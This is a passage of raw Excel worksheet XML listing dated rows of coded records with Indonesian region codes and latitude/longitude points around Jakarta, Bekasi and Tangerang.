      <c r="B3155" s="1">
        <v>44246</v>
      </c>
      <c r="C3155" s="2">
        <v>0.84439814814814806</v>
      </c>
      <c r="D3155" t="s">
        <v>22</v>
      </c>
      <c r="E3155" t="s">
        <v>23</v>
      </c>
      <c r="F3155" t="s">
        <v>10593</v>
      </c>
      <c r="H3155" t="s">
        <v>26</v>
      </c>
      <c r="I3155" t="s">
        <v>373</v>
      </c>
      <c r="J3155" t="s">
        <v>10594</v>
      </c>
      <c r="L3155" t="s">
        <v>2794</v>
      </c>
      <c r="M3155">
        <v>3171070002</v>
      </c>
      <c r="N3155">
        <v>3171070</v>
      </c>
      <c r="O3155">
        <v>3171</v>
      </c>
      <c r="P3155">
        <v>31</v>
      </c>
      <c r="Q3155" t="s">
        <v>2142</v>
      </c>
      <c r="R3155" t="s">
        <v>121</v>
      </c>
      <c r="S3155" t="s">
        <v>108</v>
      </c>
      <c r="T3155" t="s">
        <v>33</v>
      </c>
      <c r="U3155" s="5">
        <v>10682160</v>
      </c>
      <c r="V3155" s="5" t="s">
        <v>17287</v>
      </c>
      <c r="W3155" s="5">
        <v>-624377</v>
      </c>
      <c r="X3155" t="s">
        <v>18294</v>
      </c>
      <c r="Y3155" t="str">
        <f t="shared" si="49"/>
        <v>-6.24377,106.82160</v>
      </c>
    </row>
    <row r="3156" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3156">
        <v>257876</v>
      </c>
      <c r="B3156" s="1">
        <v>44246</v>
      </c>
      <c r="C3156" s="2">
        <v>0.84439814814814806</v>
      </c>
      <c r="D3156" t="s">
        <v>22</v>
      </c>
      <c r="E3156" t="s">
        <v>23</v>
      </c>
      <c r="F3156" t="s">
        <v>10595</v>
      </c>
      <c r="G3156" t="s">
        <v>10596</v>
      </c>
      <c r="H3156" t="s">
        <v>26</v>
      </c>
      <c r="I3156" t="s">
        <v>10597</v>
      </c>
      <c r="J3156" t="s">
        <v>4142</v>
      </c>
      <c r="L3156" t="s">
        <v>10598</v>
      </c>
      <c r="M3156">
        <v>3171040004</v>
      </c>
      <c r="N3156">
        <v>3171040</v>
      </c>
      <c r="O3156">
        <v>3171</v>
      </c>
      <c r="P3156">
        <v>31</v>
      </c>
      <c r="Q3156" t="s">
        <v>4144</v>
      </c>
      <c r="R3156" t="s">
        <v>163</v>
      </c>
      <c r="S3156" t="s">
        <v>108</v>
      </c>
      <c r="T3156" t="s">
        <v>33</v>
      </c>
      <c r="U3156" s="5">
        <v>10675971</v>
      </c>
      <c r="V3156" s="5" t="s">
        <v>17288</v>
      </c>
      <c r="W3156" s="5">
        <v>-623883</v>
      </c>
      <c r="X3156" t="s">
        <v>21027</v>
      </c>
      <c r="Y3156" t="str">
        <f t="shared" si="49"/>
        <v>-6.23883,106.75971</v>
      </c>
    </row>
    <row r="3157" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3157">
        <v>257889</v>
      </c>
      <c r="B3157" s="1">
        <v>44246</v>
      </c>
      <c r="C3157" s="2">
        <v>0.84528935185185183</v>
      </c>
      <c r="D3157" t="s">
        <v>22</v>
      </c>
      <c r="E3157" t="s">
        <v>23</v>
      </c>
      <c r="F3157" t="s">
        <v>10599</v>
      </c>
      <c r="H3157" t="s">
        <v>26</v>
      </c>
      <c r="I3157" t="s">
        <v>542</v>
      </c>
      <c r="J3157" t="s">
        <v>2820</v>
      </c>
      <c r="L3157" t="s">
        <v>2794</v>
      </c>
      <c r="M3157">
        <v>3171020006</v>
      </c>
      <c r="N3157">
        <v>3171020</v>
      </c>
      <c r="O3157">
        <v>3171</v>
      </c>
      <c r="P3157">
        <v>31</v>
      </c>
      <c r="Q3157" t="s">
        <v>499</v>
      </c>
      <c r="R3157" t="s">
        <v>484</v>
      </c>
      <c r="S3157" t="s">
        <v>108</v>
      </c>
      <c r="T3157" t="s">
        <v>33</v>
      </c>
      <c r="U3157" s="5">
        <v>10682795</v>
      </c>
      <c r="V3157" s="5" t="s">
        <v>17289</v>
      </c>
      <c r="W3157" s="5">
        <v>-627806</v>
      </c>
      <c r="X3157" t="s">
        <v>21028</v>
      </c>
      <c r="Y3157" t="str">
        <f t="shared" si="49"/>
        <v>-6.27806,106.82795</v>
      </c>
    </row>
    <row r="3158" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3158">
        <v>257890</v>
      </c>
      <c r="B3158" s="1">
        <v>44246</v>
      </c>
      <c r="C3158" s="2">
        <v>0.84582175925925929</v>
      </c>
      <c r="D3158" t="s">
        <v>22</v>
      </c>
      <c r="E3158" t="s">
        <v>23</v>
      </c>
      <c r="F3158" t="s">
        <v>10600</v>
      </c>
      <c r="H3158" t="s">
        <v>26</v>
      </c>
      <c r="I3158" t="s">
        <v>3481</v>
      </c>
      <c r="J3158" t="s">
        <v>2140</v>
      </c>
      <c r="L3158" t="s">
        <v>2794</v>
      </c>
      <c r="M3158">
        <v>3171070002</v>
      </c>
      <c r="N3158">
        <v>3171070</v>
      </c>
      <c r="O3158">
        <v>3171</v>
      </c>
      <c r="P3158">
        <v>31</v>
      </c>
      <c r="Q3158" t="s">
        <v>2142</v>
      </c>
      <c r="R3158" t="s">
        <v>121</v>
      </c>
      <c r="S3158" t="s">
        <v>108</v>
      </c>
      <c r="T3158" t="s">
        <v>33</v>
      </c>
      <c r="U3158" s="5">
        <v>10681574</v>
      </c>
      <c r="V3158" s="5" t="s">
        <v>17290</v>
      </c>
      <c r="W3158" s="5">
        <v>-625458</v>
      </c>
      <c r="X3158" t="s">
        <v>21029</v>
      </c>
      <c r="Y3158" t="str">
        <f t="shared" si="49"/>
        <v>-6.25458,106.81574</v>
      </c>
    </row>
    <row r="3159" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3159">
        <v>257903</v>
      </c>
      <c r="B3159" s="1">
        <v>44246</v>
      </c>
      <c r="C3159" s="2">
        <v>0.85038194444444448</v>
      </c>
      <c r="D3159" t="s">
        <v>22</v>
      </c>
      <c r="E3159" t="s">
        <v>23</v>
      </c>
      <c r="F3159" t="s">
        <v>10601</v>
      </c>
      <c r="G3159" t="s">
        <v>10602</v>
      </c>
      <c r="H3159" t="s">
        <v>26</v>
      </c>
      <c r="I3159" t="s">
        <v>4261</v>
      </c>
      <c r="J3159" t="s">
        <v>10603</v>
      </c>
      <c r="L3159" t="s">
        <v>10604</v>
      </c>
      <c r="M3159">
        <v>3171070001</v>
      </c>
      <c r="N3159">
        <v>3171070</v>
      </c>
      <c r="O3159">
        <v>3171</v>
      </c>
      <c r="P3159">
        <v>31</v>
      </c>
      <c r="Q3159" t="s">
        <v>120</v>
      </c>
      <c r="R3159" t="s">
        <v>121</v>
      </c>
      <c r="S3159" t="s">
        <v>108</v>
      </c>
      <c r="T3159" t="s">
        <v>33</v>
      </c>
      <c r="U3159" s="5">
        <v>10682506</v>
      </c>
      <c r="V3159" s="5" t="s">
        <v>17291</v>
      </c>
      <c r="W3159" s="5">
        <v>-626876</v>
      </c>
      <c r="X3159" t="s">
        <v>21000</v>
      </c>
      <c r="Y3159" t="str">
        <f t="shared" si="49"/>
        <v>-6.26876,106.82506</v>
      </c>
    </row>
    <row r="3160" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3160">
        <v>257916</v>
      </c>
      <c r="B3160" s="1">
        <v>44246</v>
      </c>
      <c r="C3160" s="2">
        <v>0.85266203703703702</v>
      </c>
      <c r="D3160" t="s">
        <v>22</v>
      </c>
      <c r="E3160" t="s">
        <v>23</v>
      </c>
      <c r="F3160" t="s">
        <v>10605</v>
      </c>
      <c r="G3160" t="s">
        <v>10606</v>
      </c>
      <c r="H3160" t="s">
        <v>26</v>
      </c>
      <c r="I3160" t="s">
        <v>3243</v>
      </c>
      <c r="J3160" t="s">
        <v>2777</v>
      </c>
      <c r="M3160">
        <v>3171070002</v>
      </c>
      <c r="N3160">
        <v>3171070</v>
      </c>
      <c r="O3160">
        <v>3171</v>
      </c>
      <c r="P3160">
        <v>31</v>
      </c>
      <c r="Q3160" t="s">
        <v>2142</v>
      </c>
      <c r="R3160" t="s">
        <v>121</v>
      </c>
      <c r="S3160" t="s">
        <v>108</v>
      </c>
      <c r="T3160" t="s">
        <v>33</v>
      </c>
      <c r="U3160" s="5">
        <v>10682086</v>
      </c>
      <c r="V3160" s="5" t="s">
        <v>17292</v>
      </c>
      <c r="W3160" s="5">
        <v>-624688</v>
      </c>
      <c r="X3160" t="s">
        <v>21030</v>
      </c>
      <c r="Y3160" t="str">
        <f t="shared" si="49"/>
        <v>-6.24688,106.82086</v>
      </c>
    </row>
    <row r="3161" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3161">
        <v>257917</v>
      </c>
      <c r="B3161" s="1">
        <v>44246</v>
      </c>
      <c r="C3161" s="2">
        <v>0.85420138888888886</v>
      </c>
      <c r="D3161" t="s">
        <v>22</v>
      </c>
      <c r="E3161" t="s">
        <v>23</v>
      </c>
      <c r="F3161" t="s">
        <v>10607</v>
      </c>
      <c r="H3161" t="s">
        <v>26</v>
      </c>
      <c r="I3161" t="s">
        <v>5188</v>
      </c>
      <c r="J3161" t="s">
        <v>10608</v>
      </c>
      <c r="L3161" t="s">
        <v>10609</v>
      </c>
      <c r="M3161">
        <v>3172020002</v>
      </c>
      <c r="N3161">
        <v>3172020</v>
      </c>
      <c r="O3161">
        <v>3172</v>
      </c>
      <c r="P3161">
        <v>31</v>
      </c>
      <c r="Q3161" t="s">
        <v>2818</v>
      </c>
      <c r="R3161" t="s">
        <v>1644</v>
      </c>
      <c r="S3161" t="s">
        <v>49</v>
      </c>
      <c r="T3161" t="s">
        <v>33</v>
      </c>
      <c r="U3161" s="5">
        <v>10687865</v>
      </c>
      <c r="V3161" s="5" t="s">
        <v>15539</v>
      </c>
      <c r="W3161" s="5">
        <v>-633144</v>
      </c>
      <c r="X3161" t="s">
        <v>21031</v>
      </c>
      <c r="Y3161" t="str">
        <f t="shared" si="49"/>
        <v>-6.33144,106.87865</v>
      </c>
    </row>
    <row r="3162" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3162">
        <v>257930</v>
      </c>
      <c r="B3162" s="1">
        <v>44246</v>
      </c>
      <c r="C3162" s="2">
        <v>0.85561342592592593</v>
      </c>
      <c r="D3162" t="s">
        <v>22</v>
      </c>
      <c r="E3162" t="s">
        <v>23</v>
      </c>
      <c r="F3162" t="s">
        <v>10610</v>
      </c>
      <c r="G3162" t="s">
        <v>10611</v>
      </c>
      <c r="H3162" t="s">
        <v>26</v>
      </c>
      <c r="I3162" t="s">
        <v>10612</v>
      </c>
      <c r="J3162" t="s">
        <v>2627</v>
      </c>
      <c r="L3162" t="s">
        <v>10613</v>
      </c>
      <c r="M3162">
        <v>3275031002</v>
      </c>
      <c r="N3162">
        <v>3275031</v>
      </c>
      <c r="O3162">
        <v>3275</v>
      </c>
      <c r="P3162">
        <v>32</v>
      </c>
      <c r="Q3162" t="s">
        <v>573</v>
      </c>
      <c r="R3162" t="s">
        <v>574</v>
      </c>
      <c r="S3162" t="s">
        <v>41</v>
      </c>
      <c r="T3162" t="s">
        <v>42</v>
      </c>
      <c r="U3162" s="5">
        <v>10700705</v>
      </c>
      <c r="V3162" s="5" t="s">
        <v>17293</v>
      </c>
      <c r="W3162" s="5">
        <v>-633076</v>
      </c>
      <c r="X3162" t="s">
        <v>21032</v>
      </c>
      <c r="Y3162" t="str">
        <f t="shared" si="49"/>
        <v>-6.33076,107.00705</v>
      </c>
    </row>
    <row r="3163" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3163">
        <v>257931</v>
      </c>
      <c r="B3163" s="1">
        <v>44246</v>
      </c>
      <c r="C3163" s="2">
        <v>0.85636574074074068</v>
      </c>
      <c r="D3163" t="s">
        <v>22</v>
      </c>
      <c r="E3163" t="s">
        <v>23</v>
      </c>
      <c r="F3163" s="3" t="s">
        <v>10614</v>
      </c>
      <c r="G3163" t="s">
        <v>10615</v>
      </c>
      <c r="H3163" t="s">
        <v>26</v>
      </c>
      <c r="I3163" t="s">
        <v>36</v>
      </c>
      <c r="J3163" t="s">
        <v>10616</v>
      </c>
      <c r="M3163">
        <v>3171020002</v>
      </c>
      <c r="N3163">
        <v>3171020</v>
      </c>
      <c r="O3163">
        <v>3171</v>
      </c>
      <c r="P3163">
        <v>31</v>
      </c>
      <c r="Q3163" t="s">
        <v>1172</v>
      </c>
      <c r="R3163" t="s">
        <v>484</v>
      </c>
      <c r="S3163" t="s">
        <v>108</v>
      </c>
      <c r="T3163" t="s">
        <v>33</v>
      </c>
      <c r="U3163" s="5">
        <v>10682166</v>
      </c>
      <c r="V3163" s="5" t="s">
        <v>17294</v>
      </c>
      <c r="W3163" s="5">
        <v>-628949</v>
      </c>
      <c r="X3163" t="s">
        <v>21033</v>
      </c>
      <c r="Y3163" t="str">
        <f t="shared" si="49"/>
        <v>-6.28949,106.82166</v>
      </c>
    </row>
    <row r="3164" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3164">
        <v>257956</v>
      </c>
      <c r="B3164" s="1">
        <v>44246</v>
      </c>
      <c r="C3164" s="2">
        <v>0.86249999999999993</v>
      </c>
      <c r="D3164" t="s">
        <v>2648</v>
      </c>
      <c r="E3164" t="s">
        <v>23</v>
      </c>
      <c r="G3164" t="s">
        <v>10617</v>
      </c>
      <c r="H3164" t="s">
        <v>26</v>
      </c>
      <c r="J3164" t="s">
        <v>2657</v>
      </c>
      <c r="L3164" t="s">
        <v>10618</v>
      </c>
      <c r="M3164">
        <v>3172070003</v>
      </c>
      <c r="N3164">
        <v>3172070</v>
      </c>
      <c r="O3164">
        <v>3172</v>
      </c>
      <c r="P3164">
        <v>31</v>
      </c>
      <c r="Q3164" t="s">
        <v>2659</v>
      </c>
      <c r="R3164" t="s">
        <v>128</v>
      </c>
      <c r="S3164" t="s">
        <v>49</v>
      </c>
      <c r="T3164" t="s">
        <v>33</v>
      </c>
      <c r="U3164" s="5">
        <v>10693090</v>
      </c>
      <c r="V3164" s="5" t="s">
        <v>17295</v>
      </c>
      <c r="W3164" s="5">
        <v>-623913</v>
      </c>
      <c r="X3164" t="s">
        <v>21034</v>
      </c>
      <c r="Y3164" t="str">
        <f t="shared" si="49"/>
        <v>-6.23913,106.93090</v>
      </c>
    </row>
    <row r="3165" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3165">
        <v>257957</v>
      </c>
      <c r="B3165" s="1">
        <v>44246</v>
      </c>
      <c r="C3165" s="2">
        <v>0.8653587962962962</v>
      </c>
      <c r="D3165" t="s">
        <v>22</v>
      </c>
      <c r="E3165" t="s">
        <v>23</v>
      </c>
      <c r="F3165" t="s">
        <v>10619</v>
      </c>
      <c r="G3165" t="s">
        <v>10620</v>
      </c>
      <c r="H3165" t="s">
        <v>26</v>
      </c>
      <c r="I3165" t="s">
        <v>722</v>
      </c>
      <c r="J3165" t="s">
        <v>2627</v>
      </c>
      <c r="L3165" t="s">
        <v>10621</v>
      </c>
      <c r="M3165">
        <v>3275031001</v>
      </c>
      <c r="N3165">
        <v>3275031</v>
      </c>
      <c r="O3165">
        <v>3275</v>
      </c>
      <c r="P3165">
        <v>32</v>
      </c>
      <c r="Q3165" t="s">
        <v>10622</v>
      </c>
      <c r="R3165" t="s">
        <v>574</v>
      </c>
      <c r="S3165" t="s">
        <v>41</v>
      </c>
      <c r="T3165" t="s">
        <v>42</v>
      </c>
      <c r="U3165" s="5">
        <v>10698848</v>
      </c>
      <c r="V3165" s="5" t="s">
        <v>17296</v>
      </c>
      <c r="W3165" s="5">
        <v>-631841</v>
      </c>
      <c r="X3165" t="s">
        <v>21035</v>
      </c>
      <c r="Y3165" t="str">
        <f t="shared" si="49"/>
        <v>-6.31841,106.98848</v>
      </c>
    </row>
    <row r="3166" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3166">
        <v>257958</v>
      </c>
      <c r="B3166" s="1">
        <v>44246</v>
      </c>
      <c r="C3166" s="2">
        <v>0.86559027777777775</v>
      </c>
      <c r="D3166" t="s">
        <v>22</v>
      </c>
      <c r="E3166" t="s">
        <v>23</v>
      </c>
      <c r="F3166" t="s">
        <v>10623</v>
      </c>
      <c r="H3166" t="s">
        <v>26</v>
      </c>
      <c r="I3166" t="s">
        <v>181</v>
      </c>
      <c r="J3166" t="s">
        <v>2916</v>
      </c>
      <c r="L3166" t="s">
        <v>10624</v>
      </c>
      <c r="M3166">
        <v>3172040003</v>
      </c>
      <c r="N3166">
        <v>3172040</v>
      </c>
      <c r="O3166">
        <v>3172</v>
      </c>
      <c r="P3166">
        <v>31</v>
      </c>
      <c r="Q3166" t="s">
        <v>552</v>
      </c>
      <c r="R3166" t="s">
        <v>281</v>
      </c>
      <c r="S3166" t="s">
        <v>49</v>
      </c>
      <c r="T3166" t="s">
        <v>33</v>
      </c>
      <c r="U3166" s="5">
        <v>10688145</v>
      </c>
      <c r="V3166" s="5" t="s">
        <v>17297</v>
      </c>
      <c r="W3166" s="5">
        <v>-626552</v>
      </c>
      <c r="X3166" t="s">
        <v>21036</v>
      </c>
      <c r="Y3166" t="str">
        <f t="shared" si="49"/>
        <v>-6.26552,106.88145</v>
      </c>
    </row>
    <row r="3167" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3167">
        <v>257972</v>
      </c>
      <c r="B3167" s="1">
        <v>44246</v>
      </c>
      <c r="C3167" s="2">
        <v>0.86703703703703694</v>
      </c>
      <c r="D3167" t="s">
        <v>22</v>
      </c>
      <c r="E3167" t="s">
        <v>23</v>
      </c>
      <c r="F3167" t="s">
        <v>10625</v>
      </c>
      <c r="G3167" t="s">
        <v>10626</v>
      </c>
      <c r="H3167" t="s">
        <v>26</v>
      </c>
      <c r="I3167" t="s">
        <v>193</v>
      </c>
      <c r="J3167" t="s">
        <v>2485</v>
      </c>
      <c r="L3167" t="s">
        <v>10627</v>
      </c>
      <c r="M3167">
        <v>3171080001</v>
      </c>
      <c r="N3167">
        <v>3171080</v>
      </c>
      <c r="O3167">
        <v>3171</v>
      </c>
      <c r="P3167">
        <v>31</v>
      </c>
      <c r="Q3167" t="s">
        <v>2265</v>
      </c>
      <c r="R3167" t="s">
        <v>1403</v>
      </c>
      <c r="S3167" t="s">
        <v>108</v>
      </c>
      <c r="T3167" t="s">
        <v>33</v>
      </c>
      <c r="U3167" s="5">
        <v>10682851</v>
      </c>
      <c r="V3167" s="5" t="s">
        <v>17298</v>
      </c>
      <c r="W3167" s="5">
        <v>-626683</v>
      </c>
      <c r="X3167" t="s">
        <v>21037</v>
      </c>
      <c r="Y3167" t="str">
        <f t="shared" si="49"/>
        <v>-6.26683,106.82851</v>
      </c>
    </row>
    <row r="3168" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3168">
        <v>258013</v>
      </c>
      <c r="B3168" s="1">
        <v>44246</v>
      </c>
      <c r="C3168" s="2">
        <v>0.87569444444444444</v>
      </c>
      <c r="D3168" t="s">
        <v>2648</v>
      </c>
      <c r="E3168" t="s">
        <v>23</v>
      </c>
      <c r="G3168" t="s">
        <v>10628</v>
      </c>
      <c r="H3168" t="s">
        <v>26</v>
      </c>
      <c r="J3168" t="s">
        <v>10629</v>
      </c>
      <c r="L3168" t="s">
        <v>10630</v>
      </c>
      <c r="M3168">
        <v>3172020001</v>
      </c>
      <c r="N3168">
        <v>3172020</v>
      </c>
      <c r="O3168">
        <v>3172</v>
      </c>
      <c r="P3168">
        <v>31</v>
      </c>
      <c r="Q3168" t="s">
        <v>7796</v>
      </c>
      <c r="R3168" t="s">
        <v>1644</v>
      </c>
      <c r="S3168" t="s">
        <v>49</v>
      </c>
      <c r="T3168" t="s">
        <v>33</v>
      </c>
      <c r="U3168" s="5">
        <v>10687051</v>
      </c>
      <c r="V3168" s="5" t="s">
        <v>17299</v>
      </c>
      <c r="W3168" s="5">
        <v>-634851</v>
      </c>
      <c r="X3168" t="s">
        <v>21038</v>
      </c>
      <c r="Y3168" t="str">
        <f t="shared" si="49"/>
        <v>-6.34851,106.87051</v>
      </c>
    </row>
    <row r="3169" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3169">
        <v>258026</v>
      </c>
      <c r="B3169" s="1">
        <v>44246</v>
      </c>
      <c r="C3169" s="2">
        <v>0.88124999999999998</v>
      </c>
      <c r="D3169" t="s">
        <v>22</v>
      </c>
      <c r="E3169" t="s">
        <v>23</v>
      </c>
      <c r="F3169" t="s">
        <v>10631</v>
      </c>
      <c r="G3169" t="s">
        <v>10632</v>
      </c>
      <c r="H3169" t="s">
        <v>26</v>
      </c>
      <c r="I3169" t="s">
        <v>8605</v>
      </c>
      <c r="J3169" t="s">
        <v>3135</v>
      </c>
      <c r="L3169" t="s">
        <v>10633</v>
      </c>
      <c r="M3169">
        <v>3603050003</v>
      </c>
      <c r="N3169">
        <v>3603050</v>
      </c>
      <c r="O3169">
        <v>3603</v>
      </c>
      <c r="P3169">
        <v>36</v>
      </c>
      <c r="Q3169" t="s">
        <v>3987</v>
      </c>
      <c r="R3169" t="s">
        <v>3988</v>
      </c>
      <c r="S3169" t="s">
        <v>201</v>
      </c>
      <c r="T3169" t="s">
        <v>171</v>
      </c>
      <c r="U3169" s="5">
        <v>10657719</v>
      </c>
      <c r="V3169" s="5" t="s">
        <v>17300</v>
      </c>
      <c r="W3169" s="5">
        <v>-625140</v>
      </c>
      <c r="X3169" t="s">
        <v>21039</v>
      </c>
      <c r="Y3169" t="str">
        <f t="shared" si="49"/>
        <v>-6.25140,106.57719</v>
      </c>
    </row>
    <row r="3170" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3170">
        <v>258058</v>
      </c>
      <c r="B3170" s="1">
        <v>44246</v>
      </c>
      <c r="C3170" s="2">
        <v>0.88861111111111113</v>
      </c>
      <c r="D3170" t="s">
        <v>22</v>
      </c>
      <c r="E3170" t="s">
        <v>23</v>
      </c>
      <c r="F3170" t="s">
        <v>10634</v>
      </c>
      <c r="G3170" t="s">
        <v>10635</v>
      </c>
      <c r="H3170" t="s">
        <v>26</v>
      </c>
      <c r="I3170" t="s">
        <v>10636</v>
      </c>
      <c r="J3170" t="s">
        <v>8093</v>
      </c>
      <c r="L3170" t="s">
        <v>10637</v>
      </c>
      <c r="M3170">
        <v>3172020004</v>
      </c>
      <c r="N3170">
        <v>3172020</v>
      </c>
      <c r="O3170">
        <v>3172</v>
      </c>
      <c r="P3170">
        <v>31</v>
      </c>
      <c r="Q3170" t="s">
        <v>7607</v>
      </c>
      <c r="R3170" t="s">
        <v>1644</v>
      </c>
      <c r="S3170" t="s">
        <v>49</v>
      </c>
      <c r="T3170" t="s">
        <v>33</v>
      </c>
      <c r="U3170" s="5">
        <v>10686817</v>
      </c>
      <c r="V3170" s="5" t="s">
        <v>17301</v>
      </c>
      <c r="W3170" s="5">
        <v>-632194</v>
      </c>
      <c r="X3170" t="s">
        <v>21040</v>
      </c>
      <c r="Y3170" t="str">
        <f t="shared" si="49"/>
        <v>-6.32194,106.86817</v>
      </c>
    </row>
    <row r="3171" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3171">
        <v>258101</v>
      </c>
      <c r="B3171" s="1">
        <v>44246</v>
      </c>
      <c r="C3171" s="2">
        <v>0.89896990740740745</v>
      </c>
      <c r="D3171" t="s">
        <v>22</v>
      </c>
      <c r="E3171" t="s">
        <v>23</v>
      </c>
      <c r="F3171" t="s">
        <v>10638</v>
      </c>
      <c r="G3171" t="s">
        <v>10639</v>
      </c>
      <c r="H3171" t="s">
        <v>26</v>
      </c>
      <c r="I3171" t="s">
        <v>117</v>
      </c>
      <c r="J3171" t="s">
        <v>2627</v>
      </c>
      <c r="L3171" t="s">
        <v>10640</v>
      </c>
      <c r="M3171">
        <v>3216081001</v>
      </c>
      <c r="N3171">
        <v>3216081</v>
      </c>
      <c r="O3171">
        <v>3216</v>
      </c>
      <c r="P3171">
        <v>32</v>
      </c>
      <c r="Q3171" t="s">
        <v>1726</v>
      </c>
      <c r="R3171" t="s">
        <v>2512</v>
      </c>
      <c r="S3171" t="s">
        <v>41</v>
      </c>
      <c r="T3171" t="s">
        <v>42</v>
      </c>
      <c r="U3171" s="5">
        <v>10702690</v>
      </c>
      <c r="V3171" s="5" t="s">
        <v>17302</v>
      </c>
      <c r="W3171" s="5">
        <v>-627749</v>
      </c>
      <c r="X3171" t="s">
        <v>21041</v>
      </c>
      <c r="Y3171" t="str">
        <f t="shared" si="49"/>
        <v>-6.27749,107.02690</v>
      </c>
    </row>
    <row r="3172" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3172">
        <v>258116</v>
      </c>
      <c r="B3172" s="1">
        <v>44246</v>
      </c>
      <c r="C3172" s="2">
        <v>0.90186342592592583</v>
      </c>
      <c r="D3172" t="s">
        <v>22</v>
      </c>
      <c r="E3172" t="s">
        <v>23</v>
      </c>
      <c r="F3172" t="s">
        <v>10641</v>
      </c>
      <c r="G3172" t="s">
        <v>10642</v>
      </c>
      <c r="H3172" t="s">
        <v>26</v>
      </c>
      <c r="I3172" t="s">
        <v>2016</v>
      </c>
      <c r="J3172" t="s">
        <v>2816</v>
      </c>
      <c r="M3172">
        <v>3172020002</v>
      </c>
      <c r="N3172">
        <v>3172020</v>
      </c>
      <c r="O3172">
        <v>3172</v>
      </c>
      <c r="P3172">
        <v>31</v>
      </c>
      <c r="Q3172" t="s">
        <v>2818</v>
      </c>
      <c r="R3172" t="s">
        <v>1644</v>
      </c>
      <c r="S3172" t="s">
        <v>49</v>
      </c>
      <c r="T3172" t="s">
        <v>33</v>
      </c>
      <c r="U3172" s="5">
        <v>10688125</v>
      </c>
      <c r="V3172" s="5" t="s">
        <v>17303</v>
      </c>
      <c r="W3172" s="5">
        <v>-633236</v>
      </c>
      <c r="X3172" t="s">
        <v>21042</v>
      </c>
      <c r="Y3172" t="str">
        <f t="shared" si="49"/>
        <v>-6.33236,106.88125</v>
      </c>
    </row>
    <row r="3173" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3173">
        <v>258117</v>
      </c>
      <c r="B3173" s="1">
        <v>44246</v>
      </c>
      <c r="C3173" s="2">
        <v>0.90303240740740742</v>
      </c>
      <c r="D3173" t="s">
        <v>22</v>
      </c>
      <c r="E3173" t="s">
        <v>23</v>
      </c>
      <c r="F3173" t="s">
        <v>10643</v>
      </c>
      <c r="G3173" t="s">
        <v>10644</v>
      </c>
      <c r="H3173" t="s">
        <v>26</v>
      </c>
      <c r="I3173" t="s">
        <v>1005</v>
      </c>
      <c r="J3173" t="s">
        <v>3135</v>
      </c>
      <c r="L3173" t="s">
        <v>10645</v>
      </c>
      <c r="M3173">
        <v>3603051005</v>
      </c>
      <c r="N3173">
        <v>3603051</v>
      </c>
      <c r="O3173">
        <v>3603</v>
      </c>
      <c r="P3173">
        <v>36</v>
      </c>
      <c r="Q3173" t="s">
        <v>3998</v>
      </c>
      <c r="R3173" t="s">
        <v>257</v>
      </c>
      <c r="S3173" t="s">
        <v>201</v>
      </c>
      <c r="T3173" t="s">
        <v>171</v>
      </c>
      <c r="U3173" s="5">
        <v>10659479</v>
      </c>
      <c r="V3173" s="5" t="s">
        <v>17304</v>
      </c>
      <c r="W3173" s="5">
        <v>-621545</v>
      </c>
      <c r="X3173" t="s">
        <v>21043</v>
      </c>
      <c r="Y3173" t="str">
        <f t="shared" si="49"/>
        <v>-6.21545,106.59479</v>
      </c>
    </row>
    <row r="3174" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3174">
        <v>258118</v>
      </c>
      <c r="B3174" s="1">
        <v>44246</v>
      </c>
      <c r="C3174" s="2">
        <v>0.90327546296296291</v>
      </c>
      <c r="D3174" t="s">
        <v>22</v>
      </c>
      <c r="E3174" t="s">
        <v>23</v>
      </c>
      <c r="F3174" t="s">
        <v>10646</v>
      </c>
      <c r="H3174" t="s">
        <v>26</v>
      </c>
      <c r="I3174" t="s">
        <v>5188</v>
      </c>
      <c r="J3174" t="s">
        <v>10361</v>
      </c>
      <c r="L3174" t="s">
        <v>10647</v>
      </c>
      <c r="M3174">
        <v>3171080004</v>
      </c>
      <c r="N3174">
        <v>3171080</v>
      </c>
      <c r="O3174">
        <v>3171</v>
      </c>
      <c r="P3174">
        <v>31</v>
      </c>
      <c r="Q3174" t="s">
        <v>1403</v>
      </c>
      <c r="R3174" t="s">
        <v>1403</v>
      </c>
      <c r="S3174" t="s">
        <v>108</v>
      </c>
      <c r="T3174" t="s">
        <v>33</v>
      </c>
      <c r="U3174" s="5">
        <v>10683646</v>
      </c>
      <c r="V3174" s="5" t="s">
        <v>17305</v>
      </c>
      <c r="W3174" s="5">
        <v>-624610</v>
      </c>
      <c r="X3174" t="s">
        <v>21044</v>
      </c>
      <c r="Y3174" t="str">
        <f t="shared" si="49"/>
        <v>-6.24610,106.83646</v>
      </c>
    </row>
    <row r="3175" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3175">
        <v>258184</v>
      </c>
      <c r="B3175" s="1">
        <v>44246</v>
      </c>
      <c r="C3175" s="2">
        <v>0.91614583333333333</v>
      </c>
      <c r="D3175" t="s">
        <v>22</v>
      </c>
      <c r="E3175" t="s">
        <v>23</v>
      </c>
      <c r="F3175" t="s">
        <v>10648</v>
      </c>
      <c r="G3175" t="s">
        <v>10649</v>
      </c>
      <c r="H3175" t="s">
        <v>26</v>
      </c>
      <c r="I3175" t="s">
        <v>1359</v>
      </c>
      <c r="J3175" t="s">
        <v>10650</v>
      </c>
      <c r="L3175" t="s">
        <v>10651</v>
      </c>
      <c r="M3175">
        <v>3171080004</v>
      </c>
      <c r="N3175">
        <v>3171080</v>
      </c>
      <c r="O3175">
        <v>3171</v>
      </c>
      <c r="P3175">
        <v>31</v>
      </c>
      <c r="Q3175" t="s">
        <v>1403</v>
      </c>
      <c r="R3175" t="s">
        <v>1403</v>
      </c>
      <c r="S3175" t="s">
